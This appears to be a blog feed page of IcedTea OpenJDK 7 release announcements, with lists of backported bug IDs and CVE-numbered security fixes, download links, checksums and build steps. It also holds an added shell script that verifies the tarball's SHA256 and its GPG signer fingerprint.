InitialHeapSize) in arguments.cpp S7196277: JSR 292: Two jck/runtime tests crash on java.lang.invoke.MethodHandle.invokeExact S7197666: java -d64 -version core dumps in a box with lots of memory S7198229: Painting during resizing of the frame should be more smooth S7199143: RFE: OCSP revocation checker should provide possibility to specify connection timeout S8000435: [macosx] Button painting error under Java 7 on Mac S8000450: Restrict access to com/sun/corba/se/impl package S8000529: Regression: SimpleDateFormat incorrectly parses dates formatted with Z and z pattern letters S8000629: [macosx] Blurry rendering with Java 7 on Retina display S8000973: SA on 
windows thread inspection is broken S8002070: Remove the stack search for a resource bundle for Logger to use S8002308: [macosx] 7198229 should be applied to the user action only S8002390: (zipfs) Problems moving files between zip file systems S8003169: [macosx] JVM crash after disconnecting from projector S8003173: [macosx] Fullscreen on Mac leaves an empty rectangle S8003268: SharedRuntime::generate_native_wrapper doesn’t save all registers across runtime tracing calls for JNI critical native methods S8003992: File and other classes in java.io do not handle embedded nulls properly S8004821: Graphics2D.drawPolygon() fails with IllegalPathStateException S8004866: [macosx] HiDPI support in Aqua L&F S8005032: G1: Cleanup serial reference processing closures in concurrent marking S8005405: [macosx] Drag and Drop: wrong animation when dropped outside any drop target. S8005527: [TEST_BUG] console.sh failed Automatically with exit code 1. S8005555: TEST_BUG: java/io/Serializable/accessConstants/AccessConstants.java should be removed S8005956: C2: assert(!def_outside->member(r)) failed: Use of external LRG overlaps the same LRG defined in this block S8005997: [macosx] Printer Dialog opens an additional title bar S8006008: Memory leak in hotspot/src/share/vm/adlc/archDesc.cpp S8006014: Memory leak in hotspot/src/share/vm/adlc/dfa.cpp S8006016: Memory leak at hotspot/src/share/vm/adlc/output_c.cpp S8006242: G1: WorkerDataArray<T>::verify() too strict for double calculations S8006328: Improve robustness of sound classes S8006423: SA: NullPointerException in sun.jvm.hotspot.debugger.bsd.BsdThread.getContext(BsdThread.java:67) S8006611: Improve scripting S8006634: Unify LWCToolkit.invokeAndWait() and sun.awt.datatransfer.ToolkitThreadBlockedHandler S8006894: G1: Number of marking threads missing from PrintFlagsFinal output S8007028: java/util/NavigableMap/LockStep hit assert(flat != TypePtr::BOTTOM) failed: cannot alias-analyze an untyped ptr S8007036: G1: Too many old regions 
added to last mixed GC S8007150: Event based tracing is missing truncated field in stack trace content type S8007221: G1: concurrent phase durations do not state the time units (“secs”) S8007333: [launcher] removes multiple back slashes S8007458: [findbugs] One more beans issue, with ReflectionUtils S8007699: Move some tests from test/sun/security/provider/certpath/X509CertPath to closed repo S8007703: Remove com.sun.servicetag API S8008289: DefaultButtonModel instance keeps stale listeners in html FormView S8008301: G1: guarantee(satb_mq_set.completed_buffers_num() == 0) failure S8008366: [macosx] ActionListener called twice for JMenuItem using ScreenMenuBar S8008391: Incorrect metadata for event based tracing S8008454: test/runtime/NMT/PrintNMTStatistics is broken S8008535: JDK7 Printing : CJK and Latin Text in a string overlap S8008660: Failure in 2D Queue Flusher thread on Mac S8008738: Issue in com.sun.org.apache.xml.internal.serializer.Encodings causes some JCK tests to fail intermittently S8008744: Rework part of fix for JDK-6741606 S8008804: file descriptor leak in src/windows/native/java/net/DualStackPlainSocketImpl.c S8008916: G1: Evacuation failed tracing event S8009012: [macosx] DisplayChangedListener is not implemented in LWWindowPeer/CGraphicsEnvironment S8009125: Add NMT tests for Virtual Memory operations S8009152: A number of jtreg tests need review/improvement S8009199: Printed text become garbage on Mac OSX S8009217: REGRESSION: test com/sun/org/apache/xml/internal/security/transforms/ClassLoaderTest.java fails to compile since 7u21b03 S8009259: TEST_BUG: sun/misc/Cleaner/exitOnThrow.sh failing intermittently S8009302: Mac OS X: JVM crash on infinite recursion on Appkit Thread S8009536: G1: Apache Lucene hang during reference processing S8009638: Wrong comment for PL in LocaleISOData, 1989 forward Poland is Republic of Poland S8009751: (se) Selector spin when select, close and interestOps(0) invoked at same time (lnx) S8009911: [macosx] SWT app 
freeze when going full screen using Java 7 on Mac S8009928: PSR:PERF Increase default string table size S8009940: G1: assert(_finger == _heap_end) failed, concurrentMark.cpp:809 S8009996: tests javax/management/mxbean/MiscTest.java and javax/management/mxbean/StandardMBeanOverrideTest.java fail S8009999: Test sun/tools/jcmd/jcmd-f.sh failing after JDK-8008820 S8010009: [macosx] Unable type into online word games on MacOSX S8010090: GC ID has the wrong type S8010118: Annotate jdk caller sensitive methods with @sun.reflect.CallerSensitive S8010151: nsk/regression/b6653214 fails “assert(snapshot != NULL) failed: Worker should not be started” S8010213: Some api/javax_net/SocketFactory tests fail in 7u25 nightly build S8010309: Improve PlatformLogger.isLoggable performance by direct mapping from an integer to Level S8010399: Test8009761.java “Failed: init recursive calls: 5498. After deopt 5494″. S8010437: guarantee(this->is8bit(imm8)) failed: Short forward jump exceeds 8-bit offset S8010463: G1: Crashes with -UseTLAB and heap verification S8010514: G1: Concurrent mode failure tracing event S8010714: XML DSig API allows a RetrievalMethod to reference another RetrievalMethod S8010721: In JDK7 the menu bar disappears when a Dialog is shown S8010727: WLS fails to add a logger with “” in its own LogManager subclass instance S8010770: Zero: back port of 8000780 to HS24 broke JSR 292 S8010780: G1: Eden occupancy/capacity output wrong after a full GC S8010913: compiler/6863420 often exceeds timeout S8010927: Kitchensink crashed with SIGSEGV, Problematic frame: v ~StubRoutines::checkcast_arraycopy S8011102: Clear AVX registers after return from JNI call S8011128: (fs) Files.createDirectory fails if the resolved path is exactly 248 characters long S8011139: (reflect) Revise checking in getEnclosingClass S8011154: java/awt/Frame/ShapeNotSetSometimes/ShapeNotSetSometimes.java failed since 7u25b03 on windows S8011161: NMT: Memory leak when encountering out of memory error while 
initializing memory snapshot S8011186: [TEST_BUG] java/awt/Focus/OverrideRedirectWindowActivationTest/OverrideRedirectWindowActivationTest.java failed on windows 8 S8011200: (coll) Optimize empty HashMap and ArrayList S8011218: Kitchensink hanged, likely NMT is to blame S8011313: OCSP timeout set to wrong value if com.sun.security.ocsp.timeout not defined S8011380: FX dependency on PlatformLogger broken by 8010309 S8011425: NPE in TestObjectCountAfterGCEvent.java on Linux32 S8011557: Improve reflection utility classes S8011653: Upgrade to JAXP 1.5 S8011686: [macosx] AWT accidentally disables the NSApplicationDelegate of SWT, causing loss of OS X integration functionality S8011695: [tck-red] Application can not be run, the Security Warning dialog is gray. S8011806: 7u25-b05 hotspot fastdebug build failure S8011882: Replace spin loops as back off when suspending S8011891: The vm/gc/heap/heap_summary_after_gc event for CMS contains old data S8011901: Unsafe.getAndAddLong(obj, off, delta) does not work properly with long deltas S8011947: new hotspot build – hs24-b41 S8011952: Missing ResourceMarks in TraceMethodHandles S8011968: Kitchensink crashed with SIGSEGV in MemBaseline::baseline S8011986: [corba] idlj generates read/write union helper methods that throw wrong exception in some cases S8011990: TEST_BUG: java/util/logging/bundlesearch/ResourceBundleSearchTest.java fails on Windows S8011992: java/awt/image/mlib/MlibOpsTest.java failed since jdk7u25b05 S8012004: JInternalFrame not being finalized after closing S8012019: (fc) Thread.interrupt triggers hang in FileChannelImpl.pread (win) S8012037: Test8009761.java “Failed: init recursive calls: 7224. 
After deopt 58824″ S8012044: Give more information about self-suppression from Throwable.addSuppressed S8012082: SASL: auth-conf negotiated, but unencrypted data is accepted, reset to unencrypt S8012086: The object count event should only send events for instances occupying more than 0.5% of the heap S8012102: CollectedHeap::ensure_parsability is not always called during heap inspection S8012112: java/awt/image/mlib/MlibOpsTest.java fails on sparc solaris S8012182: Add information about class loading and unloading to event based tracing framework S8012210: Make TracingTime available when INCLUDE_TRACE = 0 S8012212: Want to link against kstat on solaris x86 as well as sparc S8012243: about 30% regression on specjvm2008.serial on 7u25 comparing 7u21 S8012265: VM often crashes on solaris with a lot of memory S8012330: [macosx] Sometimes the applet showing the modal dialog itself loses the ability to gain focus S8012335: G1: Fix bug with compressed oops in template interpreter on x86 and sparc. 
S8012381: [macosx] Collation selection ignored when printing on MacOSX S8012453: (process) Runtime.exec(String) fails if command contains spaces [win] S8012455: Missing time and date stamps for PrintGCApplicationConcurrentTime and PrintGCApplicationStoppedTime S8012558: new hotspot build – hs24-b42 S8012586: [x11] Modal dialogs for fullscreen window may show behind its owner S8012617: ArrayIndexOutOfBoundsException with some fonts using LineBreakMeasurer S8012683: Remove unused, obsolete ObjectFactory classes S8012714: Assign the unique traceid directly to the Klass upon creation S8012715: G1: GraphKit accesses PtrQueue::_index as int but is size_t S8012933: Test closed/java/awt/Dialog/DialogAnotherThread/JaWSTest.java fails since jdk 7u25 b07 S8013057: assert(_needs_gc || SafepointSynchronize::is_at_safepoint()) failed: only read at safepoint S8013117: Thread-local trace_buffer has wrong type and name S8013120: NMT: Kitchensink crashes with assert(next_region == NULL || !next_region->is_committed_region()) failed: Sanity check S8013140: Heap corruption with NetworkInterface.getByInetAddress() and long i/f name S8013196: TimeZone.getDefault() throws NPE due to sun.awt.AppContext.getAppContext() S8013214: BigApps fails due to ‘fatal error: Illegal threadstate encountered: 6′ S8013226: new hotspot build – hs24-b43 S8013228: Create new system properties to control allowable OCSP clock skew and CRL connection timeout S8013370: Null pointer exception when adding more than 9 accelators to a JMenuBar S8013380: Removal of stack walk to find resource bundle breaks Glassfish startup S8013398: Adjust number of stack guard pages on systems with large memory page size S8013416: Java Bean Persistence with XMLEncoder S8013557: XMLEncoder in 1.7 can’t encode objects initialized in no argument constructor S8013651: NMT: reserve/release sequence id’s in incorrect order due to race S8013799: new hotspot build – hs24-b44 S8013810: PrintServiceLookup.lookupPrintServices() does not 
return consistent result S8013827: File.createTempFile hangs with temp file starting with ‘com1.4′ S8013900: More warnings compiling jaxp. S8013917: Kitchensink crashed with SIGSEGV in BaselineReporter::diff_callsites S8013934: Garbage collection event for CMS has wrong cause for System.gc() S8014048: Online user guide of jconsole points incorrect link S8014129: makefile changes to allow integration of new features S8014189: JVM crash with SEGV in ConnectionGraph::record_for_escape_analysis() S8014196: ktab creates a file with zero kt_vno S8014205: Most of the Swing dialogs are blank on one win7 MUI S8014278: new hotspot build – hs24-b45 S8014326: [OSX] All libjvm symbols are exported S8014408: G1: crashes with assert assert(prev_committed_card_num == _committed_max_card_num) failed S8014411: Decrease lock order rank for event tracing locks S8014420: Default JDP address does not match the one assigned by IANA S8014423: [macosx] The scrollbar’s block increment performs incorrectly S8014427: REGRESSION: closed/javax/imageio/plugins/bmp/Write3ByteBgrTest.java fails since 7u25 b09 S8014478: EnableTracing: output from multiple threads may be mixed together S8014611: reserve_and_align() assumptions are invalid on windows S8014669: arch specific flags not passed to some link commands S8014676: Java debugger may fail to run S8014718: Netbeans IDE begins to throw a lot exceptions since 7u25 b10 S8014721: TEST_BUG: java/awt/TrayIcon/DragEventSource/DragEventSource.java fails with java.lang.UnsupportedOperationException S8014724: Broken 7u-dev build S8014745: Provide a switch to allow stack walk search of resource bundle S8014759: new hotspot build – hs24-b46 S8014811: loopTransform.cpp assert(cmp_end->in(2) == limit) failed S8014821: Regression: Focus issues with Oracle WebCenter Capture applet S8014863: Line break calculations in Java 7 are incorrect S8014891: Redundant setting of external access properties in setFeatures S8014924: JToolTip#setTipText() sometimes (very 
often) not repaints component. S8014941: make jdk7u40 the default jprt release for hs24 S8014968: OCSP and CRL connection timeout is set to four hours by default S8014969: Use open man pages for non commercial builds S8015016: Improve JAXP 1.5 error message S8015275: Resolve ambiguity in OCSPChecker & CrlRevocationChecker S8015303: [macosx] Application launched via custom URL Scheme does not receive URL S8015304: new hotspot build – hs24-b47 S8015334: Memory leak when kerning is used on Windows. S8015375: Edits to text components hang for clipboard access S8015556: [macosx] surrogate pairs do not render properly. S8015604: JDP packets containing ideographic characters are broken S8015606: Text is not rendered correctly if destination buffer is custom S8015683: object_count_after_gc should have the same timestamp for all events S8015689: new hotspot build – hs24-b48 S8015972: Refactor the sending of the object count after GC event S8016046: (process) Strict validation of input should be security manager case only [win]. S8016063: getFinalAttributes should use FindClose S8016065: Write regression test for 7167142 S8016077: new hotspot build – hs24-b49 S8016153: Property http://javax.xml.XMLConstants/property/accessExternalDTD is not recognized. 
S8016170: GC id variable in gcTrace.cpp should use typedef GCId S8016187: assert(nbits == 32 || (-(1 << nbits-1) <= x && x < ( 1 << nbits-1))) failed: value out of range S8016556: G1: Use ArrayAllocator for BitMaps S8016566: new hotspot build – hs24-b50 S8016735: Remove superfluous EnableInvokeDynamic warning from UnlockDiagnosticVMOptions check S8016814: sun.reflect.Reflection.getCallerClass returns the frame off by 1

The tarball can be downloaded from:

http://icedtea.classpath.org/download/source/icedtea-2.4.1.tar.gz

SHA256 checksums:

65142e19ee14c28106345b30b6181f5a4926dd20be599c536d778e31a8a5812a icedtea-2.4.1.tar.gz

The tarball is accompanied by a digital signature available at:

http://icedtea.classpath.org/download/source/icedtea-2.1.9.tar.gz.sig
http://icedtea.classpath.org/download/source/icedtea-2.2.9.tar.gz.sig

This is produced using my public key. See details below.

PGP Key: 248BDC07 (https://keys.indymedia.org/)
Fingerprint = EC5A 1F5E C0AD 1D15 8F1F 8F91 3B96 A578 248B DC07

The following people helped with these releases:

Andrew Hughes (synchronisation with upstream and release management)

We would also like to thank the bug reporters and testers!

To get started:

$ tar xzf icedtea-2.4.1.tar.gz
$ mkdir icedtea-build
$ cd icedtea-build
$ ../icedtea-2.4.1/configure
$ make

Full build requirements and instructions are available in the INSTALL file.

Happy hacking!
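Checking a download against the values published in the announcement above, as an added example (not part of the original post or of IcedTea's own tooling): it compares the SHA256 and pins the full 40-digit fingerprint instead of the 8-digit key ID. The function names are hypothetical, the detached signature file is passed in as an argument, and the signing key is assumed to be already imported into the local GnuPG keyring.

```shell
#!/bin/sh
# Added example: verify a release tarball before unpacking and building it.
# Usage: sh verify-release.sh icedtea-2.4.1.tar.gz <detached-signature-file>

# Both values are copied from the announcement.
EXPECTED_SHA256="65142e19ee14c28106345b30b6181f5a4926dd20be599c536d778e31a8a5812a"
EXPECTED_FPR="EC5A 1F5E C0AD 1D15 8F1F 8F91 3B96 A578 248B DC07"

# Constructed sample of a gpg --status-fd line for trying the parser offline.
# The first fingerprint (a signing subkey) is made up; the last field is the
# primary-key fingerprint.
SAMPLE_STATUS='[GNUPG:] VALIDSIG 0123456789ABCDEF0123456789ABCDEF01234567 2013-07-05 1373040000 0 4 0 1 8 00 EC5A1F5EC0AD1D158F1F8F913B96A578248BDC07'

# Strip the spaces from a human-readable fingerprint and upper-case it,
# so it can be compared with gpg's machine-readable form.
normalize_fpr() {
    printf '%s' "$1" | tr -d '[:space:]' | tr '[:lower:]' '[:upper:]'
}

# Print the lower-case hex SHA256 of a file with whichever tool is installed.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | awk '{ print $1 }'
    else
        openssl dgst -sha256 "$1" | awk '{ print $NF }'
    fi
}

# check_sha256 FILE EXPECTED
# Returns 0 on match, 1 on mismatch, 2 if the file or the expected value
# is unusable (missing file, digest of the wrong length).
check_sha256() {
    [ -f "$1" ] || return 2
    _expected=$(printf '%s' "$2" | tr '[:upper:]' '[:lower:]')
    [ "${#_expected}" -eq 64 ] || return 2
    _actual=$(sha256_of "$1") || return 2
    [ "$_actual" = "$_expected" ]
}

# Read gpg --status-fd output on stdin and print the fingerprint of the
# primary key behind a good signature. Only a VALIDSIG line counts; GOODSIG
# and the human-readable output carry just a key ID or user ID. Field 12 is
# the primary-key fingerprint; GnuPG versions that omit it give only the
# signing-key fingerprint in field 3.
signer_fpr_from_status() {
    awk '$1 == "[GNUPG:]" && $2 == "VALIDSIG" {
             print toupper(NF >= 12 ? $12 : $3); found = 1; exit
         }
         END { exit(found ? 0 : 1) }'
}

# verify_release TARBALL SIGFILE
# Succeeds only if the digest matches and the signature was made by the
# key whose full fingerprint is pinned above. An 8-digit key ID is not
# compared at all, because short IDs can collide between unrelated keys.
verify_release() {
    check_sha256 "$1" "$EXPECTED_SHA256" || {
        echo "SHA256 check failed for $1" >&2
        return 1
    }
    _status=$(gpg --batch --status-fd 1 --verify "$2" "$1" 2>/dev/null)
    _signer=$(printf '%s\n' "$_status" | signer_fpr_from_status) || {
        echo "no valid signature on $1" >&2
        return 1
    }
    [ "$_signer" = "$(normalize_fpr "$EXPECTED_FPR")" ] || {
        echo "signature is valid but made by unexpected key $_signer" >&2
        return 1
    }
}

# Run only when called with a tarball and a signature file.
if [ "$#" -eq 2 ]; then
    verify_release "$1" "$2" && echo "OK: $1"
fi
```
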
Posted over 12 years ago
I like it when visitors can leave comments, and Disqus is extremely easy to use with Pelican. It literally takes a single setting to switch on.
Posted over 12 years ago
The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver and support for alternative virtual machines. These releases update our OpenJDK 7 support to include the latest security updates. We recommend that users of the 2.1.x and 2.2.x branches upgrade to the latest release as soon as possible.

The security fixes are as follows:

- S6741606, CVE-2013-2407: Integrate Apache Santuario
- S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls
- S7170730, CVE-2013-2451: Improve Windows network stack support.
- S8000638, CVE-2013-2450: Improve deserialization
- S8000642, CVE-2013-2446: Better handling of objects for transportation
- S8001032: Restrict object access
- S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers
- S8001034, CVE-2013-1500: Memory management improvements
- S8001038, CVE-2013-2444: Resourcefully handle resources
- S8001043: Clarify definition restrictions
- S8001308: Update display of applet windows
- S8001309: Better handling of annotation interfaces
- S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost
- S8003703, CVE-2013-2412: Update RMI connection dialog box
- S8004288, CVE-2013-2449: (fs) Files.probeContentType problems
- S8004584: Augment applet contextualization
- S8005007: Better glyph processing
- S8006328, CVE-2013-2448: Improve robustness of sound classes
- S8006611: Improve scripting
- S8007467: Improve robustness of JMX internal APIs
- S8007471: Improve MBean notifications
- S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes
- S8007925: Improve cmsStageAllocLabV2ToV4curves
- S8007926: Improve cmsPipelineDup
- S8007927: Improve cmsAllocProfileSequenceDescription
- S8007929: Improve CurvesAlloc
- S8008120, CVE-2013-2457: Improve JMX class checking
- S8008124, CVE-2013-2453: Better compliance testing
- S8008128: Better API coherence for JMX
- S8008132, CVE-2013-2456: Better serialization support
- S8008585: Better JMX data handling
- S8008593: Better URLClassLoader resource management
- S8008603: Improve provision of JMX providers
- S8008607: Better input checking in JMX
- S8008611: Better handling of annotations in JMX
- S8008615: Improve robustness of JMX internal APIs
- S8008623: Better handling of MBeanServers
- S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606
- S8008982: Adjust JMX for underlying interface changes
- S8009004: Better implementation of RMI connections
- S8009008: Better manage management-api
- S8009013: Better handling of T2K glyphs
- S8009034: Improve resulting notifications in JMX
- S8009038: Improve JMX notification support
- S8009057, CVE-2013-2448: Improve MIDI event handling
- S8009067: Improve storing keys in KeyStore
- S8009071, CVE-2013-2459: Improve shape handling
- S8009235: Improve handling of TSA data
- S8009424, CVE-2013-2458: Adapt Nashorn to JSR-292 implementation change
- S8009554, CVE-2013-2454: Improve SerialJavaObject.getFields
- S8009654: Improve stability of cmsnamed
- S8010209, CVE-2013-2460: Better provision of factories
- S8011243, CVE-2013-2470: Improve ImagingLib
- S8011248, CVE-2013-2471: Better Component Rasters
- S8011253, CVE-2013-2472: Better Short Component Rasters
- S8011257, CVE-2013-2473: Better Byte Component Rasters
- S8012375, CVE-2013-1571: Improve Javadoc framing
- S8012421: Better positioning of PairPositioning
- S8012438, CVE-2013-2463: Better image validation
- S8012597, CVE-2013-2465: Better image channel verification
- S8012601, CVE-2013-2469: Better validation of image layouts
- S8014281, CVE-2013-2461: Better checking of XML signature
- S8015997: Additional improvement in Javadoc framing

S8001330 is currently only provided for HotSpot 23.7 on 2.3.x, as we’ve found it to be unstable when applied to the older HotSpots. If we find a solution for this, we’ll issue a further update.

This will be the last set of updates for the 2.1.x and 2.2.x branches. Users should upgrade to either 2.3.10 or the upcoming 2.4.1 release. Those users who need ARM32 JIT support should wait for the 2.3.11 release, coming in the next few months, which will add this to the 2.3.x series.

IcedTea includes the usual IcedTea patches to allow builds against system libraries and to support more esoteric architectures.

In this release, use of the system version of LCMS is disabled by default to ensure the most secure version is used. Before using the system version, please ensure it has the S8007925, S8007926, S8007927, S8007929 and S8009654 updates listed above.

If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome.

Full details of the release can be found below. Note that the unusually large number of backports is due to backporting from the upstream u25 release, which also provides all these.

What’s New?

New in release 2.1.9 (2013-06-29)

New features

- PR1378: Add AArch64 support to Zero

Security fixes

- S6741606, CVE-2013-2407: Integrate Apache Santuario
- S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls
- S7170730, CVE-2013-2451: Improve Windows network stack support.
- S8000638, CVE-2013-2450: Improve deserialization
- S8000642, CVE-2013-2446: Better handling of objects for transportation
- S8001032: Restrict object access
- S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers
- S8001034, CVE-2013-1500: Memory management improvements
- S8001038, CVE-2013-2444: Resourcefully handle resources
- S8001043: Clarify definition restrictions
- S8001308: Update display of applet windows
- S8001309: Better handling of annotation interfaces
- S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost
- S8003703, CVE-2013-2412: Update RMI connection dialog box
- S8004288, CVE-2013-2449: (fs) Files.probeContentType problems
- S8004584: Augment applet contextualization
- S8005007: Better glyph processing
- S8006328, CVE-2013-2448: Improve robustness of sound classes
- S8006611: Improve scripting
- S8007467: Improve robustness of JMX internal APIs
- S8007471: Improve MBean notifications
- S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes
- S8007925: Improve cmsStageAllocLabV2ToV4curves
- S8007926: Improve cmsPipelineDup
- S8007927: Improve cmsAllocProfileSequenceDescription
- S8007929: Improve CurvesAlloc
- S8008120, CVE-2013-2457: Improve JMX class checking
- S8008124, CVE-2013-2453: Better compliance testing
- S8008128: Better API coherence for JMX
- S8008132, CVE-2013-2456: Better serialization support
- S8008585: Better JMX data handling
- S8008593: Better URLClassLoader resource management
- S8008603: Improve provision of JMX providers
- S8008607: Better input checking in JMX
- S8008611: Better handling of annotations in JMX
- S8008615: Improve robustness of JMX internal APIs
- S8008623: Better handling of MBeanServers
- S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606
- S8008982: Adjust JMX for underlying interface changes
- S8009004: Better implementation of RMI connections
- S8009008: Better manage management-api
- S8009013: Better handling of T2K glyphs
- S8009034: Improve resulting notifications in JMX
- S8009038: Improve JMX notification support
- S8009057, CVE-2013-2448: Improve MIDI event handling
- S8009067: Improve storing keys in KeyStore
- S8009071, CVE-2013-2459: Improve shape handling
- S8009235: Improve handling of TSA data
- S8009424, CVE-2013-2458: Adapt Nashorn to JSR-292 implementation change
- S8009554, CVE-2013-2454: Improve SerialJavaObject.getFields
- S8009654: Improve stability of cmsnamed
- S8010209, CVE-2013-2460: Better provision of factories
- S8011243, CVE-2013-2470: Improve ImagingLib
- S8011248, CVE-2013-2471: Better Component Rasters
- S8011253, CVE-2013-2472: Better Short Component Rasters
- S8011257, CVE-2013-2473: Better Byte Component Rasters
- S8012375, CVE-2013-1571: Improve Javadoc framing
- S8012421: Better positioning of PairPositioning
- S8012438, CVE-2013-2463: Better image validation
- S8012597, CVE-2013-2465: Better image channel verification
- S8012601, CVE-2013-2469: Better validation of image layouts
- S8014281, CVE-2013-2461: Better checking of XML signature
- S8015997: Additional improvement in Javadoc framing

Backports

S7171223, RH967436: Building ExtensionSubtables.cpp should use -fno-strict-aliasing S7053526: Upgrade JDK 8 to use Little CMS 2.4 S7077803: java.lang.InternalError in java.lang.invoke.MethodHandleNatives.init S7124347: [macosx] java.lang.InternalError: not implemented yet on call Graphics2D.drawRenderedImage S7142596: RMI JPRT tests are failing S7151434, RH969884: java -jar -XX crashes java launcher S7158483: (tz) Support tzdata2012c S7188114: (launcher) need an alternate command line parser for Windows S7195301: XML Signature DOM implementation should not use instanceof to determine type of Node S7198570: (tz) Support tzdata2012f S7199143: RFE: OCSP revocation checker should provide possibility to specify connection timeout S8002070: Remove the stack search for a resource bundle for Logger to use S8002225: (tz) Support tzdata2012i S8006120: Provide “Server JRE” for 7u train S8006536: [launcher] removes trailing slashes
on arguments
S8009165: Fix for 8006435 needs revision
S8009217: REGRESSION: test com/sun/org/apache/xml/internal/security/transforms/ClassLoaderTest.java fails to compile since 7u21b03
S8009463: Regression test test\java\lang\Runtime\exec\ArgWithSpaceAndFinalBackslash.java failing.
S8009610: Blacklist certificate used with malware.
S8009987: (tz) Support tzdata2013b
S8009996: tests javax/management/mxbean/MiscTest.java and javax/management/mxbean/StandardMBeanOverrideTest.java fail
S8010118: Annotate jdk caller sensitive methods with @sun.reflect.CallerSensitive
S8010213: Some api/javax_net/SocketFactory tests fail in 7u25 nightly build
S8010714: XML DSig API allows a RetrievalMethod to reference another RetrievalMethod
S8010727: WLS fails to add a logger with “” in its own LogManager subclass instance
S8010939: Deadlock in LogManager
S8011139: (reflect) Revise checking in getEnclosingClass
S8011154: java/awt/Frame/ShapeNotSetSometimes/ShapeNotSetSometimes.java failed since 7u25b03 on windows
S8011313: OCSP timeout set to wrong value if com.sun.security.ocsp.timeout not defined
S8011557: Improve reflection utility classes
S8011806: 7u25-b05 hotspot fastdebug build failure
S8011990: TEST_BUG: java/util/logging/bundlesearch/ResourceBundleSearchTest.java fails on Windows
S8011992: java/awt/image/mlib/MlibOpsTest.java failed since jdk7u25b05
S8012112: java/awt/image/mlib/MlibOpsTest.java fails on sparc solaris
S8012243: about 30% regression on specjvm2008.serial on 7u25 comparing 7u21
S8012453: (process) Runtime.exec(String) fails if command contains spaces [win]
S8012617: ArrayIndexOutOfBoundsException with some fonts using LineBreakMeasurer
S8012933: Test closed/java/awt/Dialog/DialogAnotherThread/JaWSTest.java fails since jdk 7u25 b07
S8013196: TimeZone.getDefault() throws NPE due to sun.awt.AppContext.getAppContext()
S8013228: Create new system properties to control allowable OCSP clock skew and CRL connection timeout
S8013380: Removal of stack walk to find resource bundle breaks Glassfish startup
S8014205: Most of the Swing dialogs are blank on one win7 MUI
S8014427: REGRESSION: closed/javax/imageio/plugins/bmp/Write3ByteBgrTest.java fails since 7u25 b09
S8014618, RH962568: Need to strip leading zeros in TlsPremasterSecret of DHKeyAgreement
S8014676: Java debugger may fail to run
S8014718: Netbeans IDE begins to throw a lot exceptions since 7u25 b10
S8014745: Provide a switch to allow stack walk search of resource bundle
S8014968: OCSP and CRL connection timeout is set to four hours by default

Bug fixes
PR1095, PR1409: Allow -Werror to be turned off (HotSpot repository only).
PR1188: ASM Interpreter and Thumb2 JIT javac miscompile modulo reminder on armel

New in release 2.2.9 (2013-06-29)

New features
PR1378: Add AArch64 support to Zero

Security fixes
S6741606, CVE-2013-2407: Integrate Apache Santuario
S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls
S7170730, CVE-2013-2451: Improve Windows network stack support.
S8000638, CVE-2013-2450: Improve deserialization
S8000642, CVE-2013-2446: Better handling of objects for transportation
S8001032: Restrict object access
S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers
S8001034, CVE-2013-1500: Memory management improvements
S8001038, CVE-2013-2444: Resourcefully handle resources
S8001043: Clarify definition restrictions
S8001308: Update display of applet windows
S8001309: Better handling of annotation interfaces
S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost
S8003703, CVE-2013-2412: Update RMI connection dialog box
S8004288, CVE-2013-2449: (fs) Files.probeContentType problems
S8004584: Augment applet contextualization
S8005007: Better glyph processing
S8006328, CVE-2013-2448: Improve robustness of sound classes
S8006611: Improve scripting
S8007467: Improve robustness of JMX internal APIs
S8007471: Improve MBean notifications
S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes
S8007925: Improve cmsStageAllocLabV2ToV4curves
S8007926: Improve cmsPipelineDup
S8007927: Improve cmsAllocProfileSequenceDescription
S8007929: Improve CurvesAlloc
S8008120, CVE-2013-2457: Improve JMX class checking
S8008124, CVE-2013-2453: Better compliance testing
S8008128: Better API coherence for JMX
S8008132, CVE-2013-2456: Better serialization support
S8008585: Better JMX data handling
S8008593: Better URLClassLoader resource management
S8008603: Improve provision of JMX providers
S8008607: Better input checking in JMX
S8008611: Better handling of annotations in JMX
S8008615: Improve robustness of JMX internal APIs
S8008623: Better handling of MBeanServers
S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606
S8008982: Adjust JMX for underlying interface changes
S8009004: Better implementation of RMI connections
S8009008: Better manage management-api
S8009013: Better handling of T2K glyphs
S8009034: Improve resulting notifications in JMX
S8009038: Improve JMX notification support
S8009057, CVE-2013-2448: Improve MIDI event handling
S8009067: Improve storing keys in KeyStore
S8009071, CVE-2013-2459: Improve shape handling
S8009235: Improve handling of TSA data
S8009424, CVE-2013-2458: Adapt Nashorn to JSR-292 implementation change
S8009554, CVE-2013-2454: Improve SerialJavaObject.getFields
S8009654: Improve stability of cmsnamed
S8010209, CVE-2013-2460: Better provision of factories
S8011243, CVE-2013-2470: Improve ImagingLib
S8011248, CVE-2013-2471: Better Component Rasters
S8011253, CVE-2013-2472: Better Short Component Rasters
S8011257, CVE-2013-2473: Better Byte Component Rasters
S8012375, CVE-2013-1571: Improve Javadoc framing
S8012421: Better positioning of PairPositioning
S8012438, CVE-2013-2463: Better image validation
S8012597, CVE-2013-2465: Better image channel verification
S8012601, CVE-2013-2469: Better validation of image layouts
S8014281, CVE-2013-2461: Better checking of XML signature
S8015997: Additional improvement in Javadoc framing

Backports
S7053526: Upgrade JDK 8 to use Little CMS 2.4
